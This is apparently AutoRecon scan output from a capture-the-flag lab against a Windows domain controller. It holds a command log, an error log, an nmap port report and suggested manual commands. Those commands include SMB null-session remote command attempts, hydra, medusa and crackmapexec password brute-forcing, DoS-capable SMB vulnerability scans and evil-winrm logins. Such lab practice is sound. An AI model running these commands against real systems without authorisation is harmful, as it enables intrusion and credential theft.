nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131
smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1
smbmap -H 10.129.243.131 -P 139 -R 2>&1
smbmap -H 10.129.243.131 -P 445 -R 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1
smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1
smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1
dig -p 53 -x 10.129.243.131 @10.129.243.131
dig AXFR -p 53 @10.129.243.131
nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131
dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1
dig -p 53 -x 10.129.243.131 @10.129.243.131
dig AXFR -p 53 @10.129.243.131 megacorp.htb
nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131
gobuster dns -d megacorp.htb -r 10.129.243.131 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt"
feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.129.243.131:80/.well-known/security.txt
curl -sSikf http://10.129.243.131:80/robots.txt
curl -sSik http://10.129.243.131:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131
curl -sk -o /dev/null -H "Host: buoTkusKMRHQqExxyMge.megacorp.htb" http://megacorp.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1
wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png
nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" --script-args krb5-enum-users.realm="megacorp.htb",userdb="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131
impacket-getArch -target 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131
impacket-rpcdump -port 135 10.129.243.131
enum4linux -a -M -l -d 10.129.243.131 2>&1
nbtscan -rvh 10.129.243.131 2>&1
nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131
smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1
smbmap -H 10.129.243.131 -P 139 2>&1
nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131
smbmap -H 10.129.243.131 -P 445 2>&1
nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" --script-args krb5-enum-users.realm="megacorp.htb",userdb="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131
impacket-rpcdump -port 593 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 49667 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/tcp_49667_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/xml/tcp_49667_rpc_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 49695 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/tcp_49695_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/xml/tcp_49695_rpc_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 49843 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/tcp_49843_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/xml/tcp_49843_rpc_nmap.xml" 10.129.243.131
ffuf -u http://megacorp.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.megacorp.htb" -fs 1034 -noninteractive -s | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_megacorp.htb_vhosts_subdomains-top1million-110000.txt"
dig AXFR -p 53 @10.129.243.131
smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1
smbmap -H 10.129.243.131 -P 445 -R 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1
smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1
smbmap -H 10.129.243.131 -P 139 -R 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1
smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1
dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1
dig -p 53 -x 10.129.243.131 @10.129.243.131
dig AXFR -p 53 @10.129.243.131 megacorp.htb
nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131
gobuster dns -d megacorp.htb -r 10.129.243.131 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt"
nmap -vv --reason -Pn -T4 -sU -sV -p 88 --script="banner,krb5-enum-users" --script-args krb5-enum-users.realm="megacorp.htb",userdb="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131
dig AXFR -p 53 @10.129.243.131

56
LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_errors.log Normal file
View File

@@ -0,0 +1,56 @@
[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9).
[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131
[-] Error Output:
[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9).
[-] Command: dig AXFR -p 53 @10.129.243.131
[-] Error Output:
[*] Service scan wkhtmltoimage (tcp/80/http/wkhtmltoimage) ran a command which returned a non-zero exit code (1).
[-] Command: wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png
[-] Error Output:
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
Loading page (1/2)
[> ] 0%
[==============================> ] 50%
[==============================> ] 50%
Warning: Failed to load https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.2/themes/smoothness/jquery-ui.css (ignore)
Error: Failed to load https://fonts.googleapis.com/css?family=Open+Sans%7CMaven+Pro:500, with network status code 3 and http status code 0 - Host fonts.googleapis.com not found
Error: Failed to load https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js, with network status code 3 and http status code 0 - Host cdnjs.cloudflare.com not found
libva info: VA-API version 1.17.0
libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so
libva info: Found init function __vaDriverInit_1_17
libva error: /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so init failed
libva info: va_openDriver() returns 1
libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so
libva info: Found init function __vaDriverInit_1_8
libva info: va_openDriver() returns 0
[============================================================] 100%
Rendering (2/2)
[> ] 0%
[===============> ] 25%
[============================================================] 100%
Done
Exit with code 1 due to network error: HostNotFoundError
[*] Service scan SMBClient (tcp/139/netbios-ssn/smbclient) ran a command which returned a non-zero exit code (1).
[-] Command: smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1
[-] Error Output:
[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9).
[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131
[-] Error Output:
[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9).
[-] Command: dig AXFR -p 53 @10.129.243.131
[-] Error Output:
[*] Service scan DnsRecon Default Scan (tcp/53/domain/dnsrecon) ran a command which returned a non-zero exit code (1).
[-] Command: dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1
[-] Error Output:

77
LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt Normal file
View File

@@ -0,0 +1,77 @@
# Nmap 7.93 scan initiated Sat Oct 28 14:23:46 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml 10.129.243.131
Nmap scan report for megacorp.htb (10.129.243.131)
Host is up, received user-set (0.041s latency).
Scanned at 2023-10-28 14:23:47 CEST for 245s
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Slandovia Energy
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:26:10Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49695/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49843/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653CFE48%P=x86_64-pc-linux-gnu)
SEQ(SP=101%GCD=1%ISR=10D%TI=I%II=I%SS=S%TS=U)
SEQ(SP=101%GCD=1%ISR=10D%TI=I%II=I%TS=U)
OPS(O1=M550NW8NNS%O2=M550NW8NNS%O3=M550NW8%O4=M550NW8NNS%O5=M550NW8NNS%O6=M550NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M550NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 25314/tcp): CLEAN (Timeout)
| Check 2 (port 10793/tcp): CLEAN (Timeout)
| Check 3 (port 25536/udp): CLEAN (Timeout)
| Check 4 (port 25523/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2023-10-28T12:27:13
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 35.29 ms 10.10.14.1
2 35.21 ms megacorp.htb (10.129.243.131)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 14:27:52 2023 -- 1 IP address (1 host up) scanned in 246.21 seconds

338
LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_manual_commands.txt Normal file
View File

@@ -0,0 +1,338 @@
[*] domain on tcp/53
[-] Use dnsrecon to bruteforce subdomains of a DNS domain.
dnsrecon -n 10.129.243.131 -d <DOMAIN-NAME> -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt
[-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name.
dnsrecon -n 10.129.243.131 -d <DOMAIN-NAME> 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt"
[*] msrpc on tcp/135
[-] RPC Client:
rpcclient -p 135 -U "" 10.129.243.131
[*] netbios-ssn on tcp/139
[-] Bruteforce SMB
crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt"
[-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful:
nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131
[*] ldap on tcp/389
[-] ldapsearch command (modify before running):
ldapsearch -x -D "<username>" -w "<password>" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt"
[*] microsoft-ds on tcp/445
[-] Bruteforce SMB
crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt"
[-] Lookup SIDs
impacket-lookupsid '[username]:[password]@10.129.243.131'
[-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful:
nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131
[*] ldap on tcp/3268
[-] ldapsearch command (modify before running):
ldapsearch -x -D "<username>" -w "<password>" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt"
[*] wsman on tcp/5985
[-] Bruteforce logins:
crackmapexec winrm 10.129.243.131 -d '<domain>' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt'
[-] Check login (requires credentials):
crackmapexec winrm 10.129.243.131 -d '<domain>' -u '<username>' -p '<password>'
[-] Evil WinRM (gem install evil-winrm):
evil-winrm -u '<user>' -p '<password>' -i 10.129.243.131
evil-winrm -u '<user>' -H '<hash>' -i 10.129.243.131
[*] msrpc on tcp/49667
[-] RPC Client:
rpcclient -p 49667 -U "" 10.129.243.131
[*] msrpc on tcp/49673
[-] RPC Client:
rpcclient -p 49673 -U "" 10.129.243.131
[*] msrpc on tcp/49695
[-] RPC Client:
rpcclient -p 49695 -U "" 10.129.243.131
[*] msrpc on tcp/49843
[-] RPC Client:
rpcclient -p 49843 -U "" 10.129.243.131
[*] domain on tcp/53
[-] Use dnsrecon to bruteforce subdomains of a DNS domain.
dnsrecon -n 10.129.243.131 -d <DOMAIN-NAME> -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt
[-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name.
dnsrecon -n 10.129.243.131 -d <DOMAIN-NAME> 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
